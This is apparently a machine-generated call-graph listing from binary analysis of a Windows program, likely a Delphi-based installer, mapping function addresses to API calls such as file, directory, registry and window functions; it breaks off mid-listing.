50187 49189c 50316 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50187->50316 50240 452c6c 50188->50240 50192 4918ce 50189->50192 50317 45275c 50192->50317 50203 491978 50193->50203 50204 49193f 50193->50204 50199 447008 18 API calls 50194->50199 50195 4918ad 50195->50099 50196 49184d 50313 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50196->50313 50198 4918db 50324 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50198->50324 50202 49190d 50199->50202 50325 452dfc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50202->50325 50211 4919c0 50203->50211 50212 491987 50203->50212 50206 447008 18 API calls 50204->50206 50208 49194e 50206->50208 50207 49191a 50326 4470e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50207->50326 50210 447008 18 API calls 50208->50210 50213 49195f 50210->50213 50216 4919d3 50211->50216 50223 491a89 50211->50223 50214 447008 18 API calls 50212->50214 50219 447288 5 API calls 50213->50219 50215 491996 50214->50215 50217 447008 18 API calls 50215->50217 50220 447008 18 API calls 50216->50220 50218 4919a7 50217->50218 50224 447288 5 API calls 50218->50224 50219->50099 50221 491a00 50220->50221 50222 447008 18 API calls 50221->50222 50225 491a17 50222->50225 50223->50099 50330 446fac 18 API calls 50223->50330 50224->50099 50327 407de4 7 API calls 50225->50327 50227 491aa2 50331 42e8d8 FormatMessageA 50227->50331 50232 491a39 50233 447008 18 API calls 50232->50233 50234 491a4d 50233->50234 50328 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50234->50328 50236 491a58 50329 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50236->50329 50238 491a64 50239->50177 50336 452710 50240->50336 50242 452c89 50242->50196 50243 452c85 50243->50242 50244 452cad MoveFileA GetLastError 50243->50244 50342 45274c 50244->50342 50247->50099 50249 406bc7 50248->50249 50250 406be0 50249->50250 50251 406be9 50249->50251 50252 403400 4 API calls 50250->50252 50345 403778 50251->50345 50253 406be7 50252->50253 50255 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50253->50255 50255->50099 50256->50074 50257->50099 50258->50082 50259->50099 50260->50083 50261->50099 50263 403738 50262->50263 50264 4072ba SetCurrentDirectoryA 50263->50264 50264->50092 50265->50099 50267 403738 50266->50267 50268 42c837 GetFullPathNameA 50267->50268 50269 42c843 50268->50269 50270 42c85a 50268->50270 50269->50270 50271 42c84b 50269->50271 50272 403494 4 API calls 50270->50272 50274 4034e0 4 API calls 50271->50274 50273 42c858 50272->50273 50275 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50273->50275 50274->50273 50275->50099 50276->50108 50277->50099 50278->50121 50279->50099 50352 42c7ac 50280->50352 50283 403778 4 API calls 50284 42c8d5 50283->50284 50285 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50284->50285 50285->50099 50367 42c684 50286->50367 50289 42c8f0 50291 403400 4 API calls 50289->50291 50290 42c8f9 50292 403778 4 API calls 50290->50292 50293 42c8f7 50291->50293 50292->50293 50294 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50293->50294 50294->50099 50295->50139 50296->50099 50298 42c7ac IsDBCSLeadByte 50297->50298 50299 42c94c 50298->50299 50300 403778 4 API calls 50299->50300 50301 42c95e 50300->50301 50302 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50301->50302 50302->50099 50304 42c7ac IsDBCSLeadByte 50303->50304 50305 42c974 50304->50305 50306 403778 4 API calls 50305->50306 50307 42c985 50306->50307 50308 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50307->50308 50308->50099 50309->50166 50310->50099 50311->50175 50312->50099 50313->50099 50314->50099 50315->50187 50316->50195 50318 452710 2 API calls 50317->50318 50319 452772 50318->50319 50320 452776 50319->50320 50321 452794 CreateDirectoryA GetLastError 50319->50321 50320->50198 50322 45274c Wow64RevertWow64FsRedirection 50321->50322 50323 4527ba 50322->50323 50323->50198 50324->50099 50325->50207 50326->50099 50327->50232 50328->50236 50329->50238 50330->50227 50332 42e8fe 50331->50332 50333 4034e0 4 API calls 50332->50333 50334 42e91b 50333->50334 50335 44735c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50334->50335 50335->50099 50337 45271e 50336->50337 50338 45271a 50336->50338 50339 452727 Wow64DisableWow64FsRedirection 50337->50339 50340 452740 SetLastError 50337->50340 50338->50243 50341 45273b 50339->50341 50340->50341 50341->50243 50343 452751 Wow64RevertWow64FsRedirection 50342->50343 50344 45275b 50342->50344 50343->50344 50344->50196 50346 4037aa 50345->50346 50347 40377d 50345->50347 50348 403400 4 API calls 50346->50348 50347->50346 50349 403791 50347->50349 50351 4037a0 50348->50351 50350 4034e0 4 API calls 50349->50350 50350->50351 50351->50253 50357 42c68c 50352->50357 50354 42c80b 50354->50283 50355 42c7c1 50355->50354 50364 42c454 IsDBCSLeadByte 50355->50364 50358 42c69d 50357->50358 50359 42c701 50358->50359 50363 42c6bb 50358->50363 50361 42c6fc 50359->50361 50366 42c454 IsDBCSLeadByte 50359->50366 50361->50355 50363->50361 50365 42c454 IsDBCSLeadByte 50363->50365 50364->50355 50365->50363 50366->50361 50368 42c68c IsDBCSLeadByte 50367->50368 50369 42c68b 50368->50369 50369->50289 50369->50290 50370 41364c SetWindowLongA GetWindowLongA 50371 4136a9 SetPropA SetPropA 50370->50371 50372 41368b GetWindowLongA 50370->50372 50376 41f3ac 50371->50376 50372->50371 50373 41369a SetWindowLongA 50372->50373 50373->50371 50381 415280 50376->50381 50388 423c1c 50376->50388 50482 423a94 50376->50482 50377 4136f9 50382 41528d 50381->50382 50383 4152f3 50382->50383 50384 4152e8 50382->50384 50387 4152f1 50382->50387 50489 424b9c 13 API calls 50383->50489 50384->50387 50490 41506c 46 API calls 50384->50490 50387->50377 50404 423c52 50388->50404 50391 423cfc 50393 423d03 50391->50393 50394 423d37 50391->50394 50392 423c9d 50395 423ca3 50392->50395 50396 423d60 50392->50396 50397 423d09 50393->50397 50440 423fc1 50393->50440 50399 423d42 50394->50399 50400 4240aa IsIconic 50394->50400 50398 423ca8 50395->50398 50414 423cd5 50395->50414 50401 423d72 50396->50401 50402 423d7b 50396->50402 50406 423f23 SendMessageA 50397->50406 50407 423d17 50397->50407 50410 423e06 50398->50410 50411 423cae 50398->50411 50412 4240e6 50399->50412 50413 423d4b 50399->50413 50408 423c73 50400->50408 50409 4240be GetFocus 50400->50409 50403 423d88 50401->50403 50415 423d79 50401->50415 50500 4241a4 11 API calls 50402->50500 50501 4241ec IsIconic 50403->50501 50404->50408 50491 423b78 50404->50491 50406->50408 50407->50408 50441 423cd0 50407->50441 50461 423f66 50407->50461 50408->50377 50409->50408 50417 4240cf 50409->50417 50513 423b94 NtdllDefWindowProc_A 50410->50513 50418 423cb7 50411->50418 50419 423e2e PostMessageA 50411->50419 50535 424860 WinHelpA PostMessageA 50412->50535 50422 4240fd 50413->50422 50413->50441 50414->50408 50431 423cee 50414->50431 50432 423e4f 50414->50432 50509 423b94 NtdllDefWindowProc_A 50415->50509 50534 41f004 GetCurrentThreadId 73EA5940 50417->50534 50426 423cc0 50418->50426 50427 423eb5 50418->50427 50519 423b94 NtdllDefWindowProc_A 50419->50519 50429 424106 50422->50429 50430 42411b 50422->50430 50435 423cc9 50426->50435 50436 423dde IsIconic 50426->50436 50437 423ebe 50427->50437 50438 423eef 50427->50438 50428 423e49 50428->50408 50536 4244e4 50429->50536 50542 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 50430->50542 50431->50441 50442 423e1b 50431->50442 50495 423b94 NtdllDefWindowProc_A 50432->50495 50434 4240d6 50434->50408 50445 4240de SetFocus 50434->50445 50435->50441 50446 423da1 50435->50446 50448 423dfa 50436->50448 50449 423dee 50436->50449 50521 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50437->50521 50496 423b94 NtdllDefWindowProc_A 50438->50496 50440->50408 50456 423fe7 IsWindowEnabled 50440->50456 50441->50408 50499 423b94 NtdllDefWindowProc_A 50441->50499 50514 424188 50442->50514 50444 423e55 50453 423e93 50444->50453 50454 423e71 50444->50454 50445->50408 50446->50408 50510 422c5c ShowWindow PostMessageA PostQuitMessage 50446->50510 50512 423b94 NtdllDefWindowProc_A 50448->50512 50511 423bd0 15 API calls 50449->50511 50462 423a94 6 API calls 50453->50462 50520 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50454->50520 50455 423ec6 50464 423ed8 50455->50464 50522 41ef68 50455->50522 50456->50408 50465 423ff5 50456->50465 50459 423ef5 50466 423f0d 50459->50466 50497 41eeb4 GetCurrentThreadId 73EA5940 50459->50497 50461->50408 50468 423f88 IsWindowEnabled 50461->50468 50469 423e9b PostMessageA 50462->50469 50528 423b94 NtdllDefWindowProc_A 50464->50528 50475 423ffc IsWindowVisible 50465->50475 50473 423a94 6 API calls 50466->50473 50467 423e79 PostMessageA 50467->50408 50468->50408 50474 423f96 50468->50474 50469->50408 50473->50408 50529 412320 7 API calls 50474->50529 50475->50408 50477 42400a GetFocus 50475->50477 50530 4181f0 50477->50530 50479 42401f SetFocus 50532 415250 50479->50532 50483 423b1d 50482->50483 50484 423aa4 50482->50484 50483->50377 50484->50483 50485 423aaa EnumWindows 50484->50485 50485->50483 50486 423ac6 GetWindow GetWindowLongA 50485->50486 50646 423a2c GetWindow 50485->50646 50487 423ae5 50486->50487 50487->50483 50488 423b11 SetWindowPos 50487->50488 50488->50483 50488->50487 50489->50387 50490->50387 50492 423b82 50491->50492 50493 423b8d 50491->50493 50492->50493 50543 408728 GetSystemDefaultLCID 50492->50543 50493->50391 50493->50392 50495->50444 50496->50459 50498 41ef39 50497->50498 50498->50466 50499->50408 50500->50408 50502 424233 50501->50502 50503 4241fd SetActiveWindow 50501->50503 50502->50408 50618 42365c 50503->50618 50507 42421a 50507->50502 50508 42422d SetFocus 50507->50508 50508->50502 50509->50408 50510->50408 50511->50408 50512->50408 50513->50408 50631 41db40 50514->50631 50517 4241a0 50517->50408 50518 424194 LoadIconA 50518->50517 50519->50428 50520->50467 50521->50455 50523 41ef70 IsWindow 50522->50523 50524 41ef9c 50522->50524 50525 41ef7f EnableWindow 50523->50525 50527 41ef8a 50523->50527 50524->50464 50525->50527 50526 402660 4 API calls 50526->50527 50527->50523 50527->50524 50527->50526 50528->50408 50529->50408 50531 4181fa 50530->50531 50531->50479 50533 41526b SetFocus 50532->50533 50533->50408 50534->50434 50535->50428 50537 4244f0 50536->50537 50538 42450a 50536->50538 50539 42451f 50537->50539 50540 4244f7 SendMessageA 50537->50540 50541 402648 4 API calls 50538->50541 50539->50408 50540->50539 50541->50539 50542->50428 50598 408570 GetLocaleInfoA 50543->50598 50548 408570 5 API calls 50549 40877d 50548->50549 50550 408570 5 API calls 50549->50550 50551 4087a1 50550->50551 50610 4085bc GetLocaleInfoA 50551->50610 50554 4085bc GetLocaleInfoA 50555 4087d1 50554->50555 50556 408570 5 API calls 50555->50556 50557 4087eb 50556->50557 50558 4085bc GetLocaleInfoA 50557->50558 50559 408808 50558->50559 50560 408570 5 API calls 50559->50560 50561 408822 50560->50561 50562 403450 4 API calls 50561->50562 50563 40882f 50562->50563 50564 408570 5 API calls 50563->50564 50565 408844 50564->50565 50566 403450 4 API calls 50565->50566 50567 408851 50566->50567 50568 4085bc GetLocaleInfoA 50567->50568 50569 40885f 50568->50569 50570 408570 5 API calls 50569->50570 50571 408879 50570->50571 50572 403450 4 API calls 50571->50572 50573 408886 50572->50573 50574 408570 5 API calls 50573->50574 50575 40889b 50574->50575 50576 403450 4 API calls 50575->50576 50577 4088a8 50576->50577 50578 408570 5 API calls 50577->50578 50579 4088bd 50578->50579 50580 4088da 50579->50580 50581 4088cb 50579->50581 50583 403494 4 API calls 50580->50583 50582 403494 4 API calls 50581->50582 50599 408597 50598->50599 50600 4085a9 50598->50600 50601 4034e0 4 API calls 50599->50601 50602 403494 4 API calls 50600->50602 50603 4085a7 50601->50603 50602->50603 50604 403450 50603->50604 50605 403454 50604->50605 50608 403464 50604->50608 50607 4034bc 4 API calls 50605->50607 50605->50608 50606 403490 50606->50548 50607->50608 50608->50606 50609 402660 4 API calls 50608->50609 50609->50606 50611 4085d8 50610->50611 50611->50554 50627 423608 SystemParametersInfoA 50618->50627 50621 423675 ShowWindow 50623 423680 50621->50623 50624 423687 50621->50624 50630 423638 SystemParametersInfoA 50623->50630 50626 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50624->50626 50626->50507 50628 423626 50627->50628 50628->50621 50629 423638 SystemParametersInfoA 50628->50629 50629->50621 50630->50624 50634 41db64 50631->50634 50635 41db4a 50634->50635 50636 41db71 50634->50636 50635->50517 50635->50518 50636->50635 50643 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50636->50643 50638 41db8e 50638->50635 50639 41dba8 50638->50639 50640 41db9b 50638->50640 50644 41bd9c 11 API calls 50639->50644 50645 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50640->50645 50643->50638 50644->50635 50645->50635 50647 423a4d GetWindowLongA 50646->50647 50648 423a59 50646->50648 50647->50648 50649 4804c6 50650 4804cf 50649->50650 50651 4804fa 50649->50651 50650->50651 50652 4804ec 50650->50652 50654 480539 50651->50654 51063 47efb0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50651->51063 51061 476b6c 188 API calls 50652->51061 50655 48055d 50654->50655 50659 480550 50654->50659 50660 480552 50654->50660 50662 480599 50655->50662 50663 48057b 50655->50663 50657 4804f1 50657->50651 51062 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50657->51062 50658 48052c 51064 47f018 42 API calls 50658->51064 50666 47eff4 42 API calls 50659->50666 51065 47f088 42 API calls 50660->51065 51068 47ee48 24 API calls 50662->51068 50667 480590 50663->50667 51066 47f018 42 API calls 50663->51066 50666->50655 51067 47ee48 24 API calls 50667->51067 50669 480597 50672 4805a9 50669->50672 50673 4805af 50669->50673 50674 4805ad 50672->50674 50775 47eff4 50672->50775 50673->50674 50675 47eff4 42 API calls 50673->50675 50780 47c3a4 50674->50780 50675->50674 51137 47eadc 42 API calls 50775->51137 50777 47f00f 51138 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50777->51138 51139 42d8a8 GetWindowsDirectoryA 50780->51139 50782 47c3c2 50783 403450 4 API calls 50782->50783 50784 47c3cf 50783->50784 51141 42d8d4 GetSystemDirectoryA 50784->51141 50786 47c3d7 50787 403450 4 API calls 50786->50787 50788 47c3e4 50787->50788 51143 42d900 50788->51143 50790 47c3ec 50791 403450 4 API calls 50790->50791 50792 47c3f9 50791->50792 50793 47c402 50792->50793 50794 47c41e 50792->50794 51199 42d218 50793->51199 50795 403400 4 API calls 50794->50795 50797 47c41c 50795->50797 50799 47c463 50797->50799 50801 42c8dc 5 API calls 50797->50801 51147 47c22c 50799->51147 50800 403450 4 API calls 50800->50797 50803 47c43e 50801->50803 50805 403450 4 API calls 50803->50805 50807 47c44b 50805->50807 50806 403450 4 API calls 50808 47c47f 50806->50808 50807->50799 50812 403450 4 API calls 50807->50812 50809 47c49d 50808->50809 50810 4035c0 4 API calls 50808->50810 50811 47c22c 8 API calls 50809->50811 50810->50809 50813 47c4ac 50811->50813 50812->50799 50814 403450 4 API calls 50813->50814 50815 47c4b9 50814->50815 50816 47c4e1 50815->50816 50817 42c40c 5 API calls 50815->50817 50818 47c548 50816->50818 50822 47c22c 8 API calls 50816->50822 50819 47c4cf 50817->50819 50820 47c572 50818->50820 50821 47c551 50818->50821 50824 4035c0 4 API calls 50819->50824 51158 42c40c 50820->51158 50825 42c40c 5 API calls 50821->50825 50826 47c4f9 50822->50826 50824->50816 50829 403450 4 API calls 50826->50829 51061->50657 51063->50658 51064->50654 51065->50655 51066->50667 51067->50669 51068->50669 51137->50777 51140 42d8c9 51139->51140 51140->50782 51142 42d8f5 51141->51142 51142->50786 51144 403400 4 API calls 51143->51144 51145 42d910 GetModuleHandleA GetProcAddress 51144->51145 51146 42d929 51145->51146 51146->50790 51209 42de2c 51147->51209 51149 47c252 51150 47c256 51149->51150 51151 47c278 51149->51151 51212 42dd5c 51150->51212 51152 403400 4 API calls 51151->51152 51154 47c27f 51152->51154 51154->50806 51156 47c26d RegCloseKey 51156->51154 51157 403400 4 API calls 51157->51156 51200 4038a4 4 API calls 51199->51200 51202 42d22b 51200->51202 51201 42d242 GetEnvironmentVariableA 51201->51202 51203 42d24e 51201->51203 51202->51201 51206 42d255 51202->51206 51247 42dbe0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51202->51247 51204 403400 4 API calls 51203->51204 51204->51206 51206->50800 51210 42de37 51209->51210 51211 42de3d RegOpenKeyExA 51209->51211 51210->51211 51211->51149 51215 42dc10 51212->51215 51216 42dc36 RegQueryValueExA 51215->51216 51221 42dc59 51216->51221 51229 42dc7b 51216->51229 51217 403400 4 API calls 51219 42dd47 51217->51219 51218 42dc73 51220 403400 4 API calls 51218->51220 51219->51156 51219->51157 51220->51229 51221->51218 51222 4034e0 4 API calls 51221->51222 51221->51229 51232 403744 51221->51232 51222->51221 51224 42dcb0 RegQueryValueExA 51224->51216 51225 42dccc 51224->51225 51225->51229 51236 4038a4 51225->51236 51229->51217 51230 403744 4 API calls 51231 42dd20 51230->51231 51233 40374a 51232->51233 51235 40375b 51232->51235 51234 4034bc 4 API calls 51233->51234 51233->51235 51234->51235 51235->51224 51237 4038b1 51236->51237 51243 4038e1 51236->51243 51239 4038da 51237->51239 51241 4038bd 51237->51241 51238 403400 4 API calls 51244 4038cb 51238->51244 51240 4034bc 4 API calls 51239->51240 51240->51243 51245 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51241->51245 51243->51238 51244->51230 51244->51231 51245->51244 51247->51202 53303 46be48 53304 46c254 53303->53304 53305 46be7c 53303->53305 53306 403400 4 API calls 53304->53306 53307 46beb8 53305->53307 53310 46bf14 53305->53310 53311 46bef2 53305->53311 53312 46bf03 53305->53312 53313 46bed0 53305->53313 53314 46bee1 53305->53314 53308 46c293 53306->53308 53307->53304 53389 468fe0 53307->53389 53316 403400 4 API calls 53308->53316 53621 46bdd8 45 API calls 53310->53621 53354 46ba08 53311->53354 53620 46bbc8 67 API calls 53312->53620 53618 46b758 47 API calls 53313->53618 53619 46b8c0 42 API calls 53314->53619 53321 46c29b 53316->53321 53322 46bed6 53322->53304 53322->53307 53323 46bf50 53323->53304 53324 494770 18 API calls 53323->53324 53340 46bf93 53323->53340 53324->53340 53326 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53326->53340 53327 46c0b6 53622 48300c 123 API calls 53327->53622 53330 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53330->53340 53331 42cbd0 6 API calls 53331->53340 53332 46c0d1 53332->53304 53334 46b2a0 23 API calls 53334->53340 53337 46c136 53341 457d58 24 API calls 53337->53341 53338 46c17c 53342 46b2a0 23 API calls 53338->53342 53339 46c18e 53468 46b2a0 53339->53468 53340->53304 53340->53326 53340->53327 53340->53330 53340->53331 53340->53334 53340->53337 53340->53338 53340->53339 53392 468f1c 53340->53392 53400 46b00c 53340->53400 53407 46a26c 53340->53407 53545 482b0c 53340->53545 53631 46b514 19 API calls 53340->53631 53344 46c155 53341->53344 53342->53304 53345 457d58 24 API calls 53344->53345 53345->53338 53346 46c19b 53347 46c1c4 SetActiveWindow 53346->53347 53348 46c1dc 53346->53348 53347->53348 53503 46a60c 53348->53503 53350 46c1ff 53350->53338 53351 46c21a 53350->53351 53623 46b11c 53351->53623 53632 46c6cc 53354->53632 53357 46bb8a 53358 403420 4 API calls 53357->53358 53360 46bba4 53358->53360 53362 403400 4 API calls 53360->53362 53361 46ba56 53363 46bb76 53361->53363 53639 455f70 13 API calls 53361->53639 53365 46bbac 53362->53365 53363->53357 53364 403450 4 API calls 53363->53364 53364->53357 53367 403400 4 API calls 53365->53367 53368 46bbb4 53367->53368 53368->53307 53369 42cd58 7 API calls 53373 46bb12 53369->53373 53370 46bb39 53370->53357 53370->53363 53375 42cd58 7 API calls 53370->53375 53371 46bad9 53371->53357 53371->53369 53371->53370 53372 46ba74 53372->53371 53640 46696c 53372->53640 53373->53370 53377 451444 4 API calls 53373->53377 53378 46bb4f 53375->53378 53380 46bb29 53377->53380 53378->53363 53383 451444 4 API calls 53378->53383 53379 46696c 19 API calls 53381 46bab4 53379->53381 53645 47eadc 42 API calls 53380->53645 53385 451414 4 API calls 53381->53385 53384 46bb66 53383->53384 53646 47eadc 42 API calls 53384->53646 53387 46bac9 53385->53387 53644 47eadc 42 API calls 53387->53644 53390 468f1c 19 API calls 53389->53390 53391 468fef 53390->53391 53391->53323 53393 468f4b 53392->53393 53394 4078fc 19 API calls 53393->53394 53397 468f8c 53393->53397 53395 468f84 53394->53395 53766 453330 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53395->53766 53398 403400 4 API calls 53397->53398 53399 468fa4 53398->53399 53399->53340 53401 46b01d 53400->53401 53402 46b018 53400->53402 53852 469dec 46 API calls 53401->53852 53403 46b01b 53402->53403 53767 46aa78 53402->53767 53403->53340 53405 46b025 53405->53340 53408 403400 4 API calls 53407->53408 53409 46a299 53408->53409 53875 47d9bc 53409->53875 53411 46a2f8 53412 46a315 53411->53412 53413 46a2fc 53411->53413 53414 46a306 53412->53414 53885 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53412->53885 53882 466b6c 53413->53882 53418 46a434 53414->53418 53419 46a49f 53414->53419 53467 46a5a9 53414->53467 53417 46a331 53417->53414 53421 46a339 53417->53421 53422 403494 4 API calls 53418->53422 53423 403494 4 API calls 53419->53423 53420 403420 4 API calls 53424 46a5d3 53420->53424 53425 46b2a0 23 API calls 53421->53425 53426 46a441 53422->53426 53427 46a4ac 53423->53427 53424->53340 53435 46a346 53425->53435 53428 40357c 4 API calls 53426->53428 53429 40357c 4 API calls 53427->53429 53430 46a44e 53428->53430 53431 46a4b9 53429->53431 53432 40357c 4 API calls 53430->53432 53433 40357c 4 API calls 53431->53433 53436 46a45b 53432->53436 53434 46a4c6 53433->53434 53438 40357c 4 API calls 53434->53438 53441 46a387 53435->53441 53442 46a36f SetActiveWindow 53435->53442 53437 40357c 4 API calls 53436->53437 53439 46a468 53437->53439 53440 46a4d3 53438->53440 53443 466b6c 20 API calls 53439->53443 53444 40357c 4 API calls 53440->53444 53886 42f570 53441->53886 53442->53441 53445 46a476 53443->53445 53446 46a4e1 53444->53446 53447 40357c 4 API calls 53445->53447 53448 414b28 4 API calls 53446->53448 53451 46a47f 53447->53451 53458 46a49d 53448->53458 53453 40357c 4 API calls 53451->53453 53456 46a48c 53453->53456 53455 46a3d8 53459 46b11c 21 API calls 53455->53459 53457 414b28 4 API calls 53456->53457 53457->53458 53903 466ea4 53458->53903 53460 46a40a 53459->53460 53460->53340 53461 46a503 53462 414b28 4 API calls 53461->53462 53461->53467 53463 46a566 53462->53463 53467->53420 53469 468fe0 19 API calls 53468->53469 53470 46b2b8 53469->53470 53471 46b2da 53470->53471 53472 465638 7 API calls 53470->53472 54022 465638 53471->54022 53472->53471 53476 46b2f2 53477 46b11c 21 API calls 53476->53477 53478 46b32a 53477->53478 53479 414b28 4 API calls 53478->53479 53480 46b33e 53479->53480 53481 46b374 53480->53481 53482 46b34a 53480->53482 53485 46b393 53481->53485 53486 46b3bd 53481->53486 53483 414b28 4 API calls 53482->53483 53484 46b35e 53483->53484 53488 414b28 4 API calls 53484->53488 53489 414b28 4 API calls 53485->53489 53487 414b28 4 API calls 53486->53487 53490 46b3d1 53487->53490 53491 46b372 53488->53491 53492 46b3a7 53489->53492 53493 414b28 4 API calls 53490->53493 54039 46b034 53491->54039 53494 414b28 4 API calls 53492->53494 53493->53491 53494->53491 53498 468fe0 19 API calls 53501 46b46f 53498->53501 53499 46b40f 53499->53498 53500 46b4d2 53500->53346 53501->53500 54044 4946bc 18 API calls 53501->54044 53505 46a637 53503->53505 53504 46a66e 53507 46a7e3 53504->53507 53520 46a682 53504->53520 53505->53504 54064 47dc30 53505->54064 53510 46a817 53507->53510 53516 46a801 53507->53516 53544 46a95a 53507->53544 53508 403400 4 API calls 53512 46a97f 53508->53512 53509 46a7c0 53513 46a7db 53509->53513 53518 402660 4 API calls 53509->53518 53511 414b28 4 API calls 53510->53511 53517 46a815 53511->53517 53512->53350 53513->53350 53514 402660 4 API calls 53514->53520 53515 402648 4 API calls 53515->53520 53521 414b28 4 API calls 53516->53521 54076 495520 MulDiv 53517->54076 53518->53513 53519 46a78c 53523 457d58 24 API calls 53519->53523 53520->53514 53520->53515 53529 46a6f5 53520->53529 53521->53517 53523->53509 53524 46a838 53527 466ea4 11 API calls 53524->53527 53526 457d58 24 API calls 53526->53529 53528 46a86c 53527->53528 53529->53509 53529->53519 53529->53526 53531 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53529->53531 54075 403ba4 7 API calls 53529->54075 53531->53529 53544->53508 53546 46c6cc 48 API calls 53545->53546 53547 482b4f 53546->53547 53548 482b58 53547->53548 54292 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53547->54292 53550 414af8 4 API calls 53548->53550 53551 482b68 53550->53551 53552 403450 4 API calls 53551->53552 53553 482b75 53552->53553 54102 46ca24 53553->54102 53556 482b85 53557 414af8 4 API calls 53556->53557 53559 482b95 53557->53559 53560 403450 4 API calls 53559->53560 53561 482ba2 53560->53561 53562 469bd4 SendMessageA 53561->53562 53563 482bbb 53562->53563 53564 482c0c 53563->53564 54294 479c64 23 API calls 53563->54294 53566 4241ec 11 API calls 53564->53566 53567 482c16 53566->53567 53568 482c3c 53567->53568 53569 482c27 SetActiveWindow 53567->53569 54131 481f3c 53568->54131 53569->53568 53618->53322 53619->53307 53620->53307 53621->53307 53622->53332 53624 468f1c 19 API calls 53623->53624 53631->53340 53647 46c764 53632->53647 53635 414af8 53636 414b06 53635->53636 53637 4034e0 4 API calls 53636->53637 53638 414b13 53637->53638 53638->53361 53639->53372 53642 466986 53640->53642 53641 4078fc 19 API calls 53643 4669c1 53641->53643 53642->53641 53643->53379 53644->53371 53645->53370 53646->53363 53648 414af8 4 API calls 53647->53648 53649 46c798 53648->53649 53708 466c04 53649->53708 53653 46c7aa 53654 46c7b9 53653->53654 53656 46c7d2 53653->53656 53742 47eadc 42 API calls 53654->53742 53659 46c819 53656->53659 53661 46c800 53656->53661 53657 403420 4 API calls 53658 46ba3a 53657->53658 53658->53357 53658->53635 53660 46c87e 53659->53660 53674 46c81d 53659->53674 53745 42cb5c CharNextA 53660->53745 53743 47eadc 42 API calls 53661->53743 53664 46c88d 53665 46c891 53664->53665 53668 46c8aa 53664->53668 53746 47eadc 42 API calls 53665->53746 53667 46c865 53744 47eadc 42 API calls 53667->53744 53669 46c8ce 53668->53669 53722 466d74 53668->53722 53747 47eadc 42 API calls 53669->53747 53674->53667 53674->53668 53677 46c8e7 53678 403778 4 API calls 53677->53678 53679 46c8fd 53678->53679 53730 42c9ac 53679->53730 53682 46c90e 53748 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53682->53748 53683 46c93f 53684 42c8dc 5 API calls 53683->53684 53686 46c94a 53684->53686 53688 42c40c 5 API calls 53686->53688 53687 46c921 53689 451444 4 API calls 53687->53689 53690 46c955 53688->53690 53691 46c92e 53689->53691 53692 42cbd0 6 API calls 53690->53692 53749 47eadc 42 API calls 53691->53749 53694 46c960 53692->53694 53734 46c6f8 53694->53734 53696 46c968 53697 42cd58 7 API calls 53696->53697 53698 46c970 53697->53698 53699 46c974 53698->53699 53700 46c98a 53698->53700 53750 47eadc 42 API calls 53699->53750 53702 46c7cd 53700->53702 53703 46c994 53700->53703 53702->53657 53704 46c99c GetDriveTypeA 53703->53704 53704->53702 53713 466c1e 53708->53713 53710 42cbd0 6 API calls 53710->53713 53711 403450 4 API calls 53711->53713 53712 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53712->53713 53713->53710 53713->53711 53713->53712 53714 466c67 53713->53714 53752 42cabc 53713->53752 53715 403420 4 API calls 53714->53715 53716 466c81 53715->53716 53717 414b28 53716->53717 53718 414af8 4 API calls 53717->53718 53719 414b4c 53718->53719 53720 403400 4 API calls 53719->53720 53721 414b7d 53720->53721 53721->53653 53723 466d7e 53722->53723 53724 466d91 53723->53724 53763 42cb4c CharNextA 53723->53763 53724->53669 53726 466da4 53724->53726 53727 466dae 53726->53727 53728 466ddb 53727->53728 53764 42cb4c CharNextA 53727->53764 53728->53669 53728->53677 53731 42ca05 53730->53731 53732 42c9c2 53730->53732 53731->53682 53731->53683 53732->53731 53765 42cb4c CharNextA 53732->53765 53735 46c75d 53734->53735 53736 46c70b 53734->53736 53735->53696 53736->53735 53737 41eeb4 2 API calls 53736->53737 53738 46c71b 53737->53738 53739 46c735 SHPathPrepareForWriteA 53738->53739 53740 41ef68 6 API calls 53739->53740 53741 46c755 53740->53741 53741->53696 53742->53702 53743->53702 53744->53702 53745->53664 53746->53702 53747->53702 53748->53687 53749->53702 53750->53702 53753 403494 4 API calls 53752->53753 53754 42cacc 53753->53754 53755 403744 4 API calls 53754->53755 53758 42cb02 53754->53758 53761 42c454 IsDBCSLeadByte 53754->53761 53755->53754 53757 42cb46 53757->53713 53758->53757 53760 4037b8 4 API calls 53758->53760 53762 42c454 IsDBCSLeadByte 53758->53762 53760->53758 53761->53754 53762->53758 53763->53723 53764->53727 53765->53732 53766->53397 53769 